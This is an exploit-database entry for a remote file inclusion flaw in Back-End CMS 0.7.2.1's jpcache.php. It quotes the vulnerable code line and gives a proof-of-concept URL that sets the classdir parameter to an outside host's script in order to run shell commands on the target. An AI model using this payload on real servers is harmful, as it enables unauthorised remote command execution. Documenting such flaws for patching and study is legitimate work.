[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Back-End CMS <= 0.7.2.1 (jpcache.php) Remote Include Vulnerability

Author
Federico Fazzi
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-499
Category
web applications
Date add
07-06-2006
Platform
unsorted
==================================================================
Back-End CMS <= 0.7.2.1 (jpcache.php) Remote Include Vulnerability
==================================================================



# Federico Fazzi, <federico@autistici.org>
# Back-end = 0.7.2.1 (jpcache.php) Remote command execution
# 08/06/2006 1:04
# Bug:
#
# jpcache.php: line 40
#
# ---
# $includedir = $_PSL['classdir'] . "/jpcache";
# ---
#
# Proof of concept:
#
# Back-end have a default path pre-set on jpcache.php,
# and cracker can execute a remote command.
#
# http://example/[be_path]/class/jpcache/jpcache.php?_PSL[classdir]=http://example/cmd.php?exec=uname



#  0day.today [2024-12-25]  #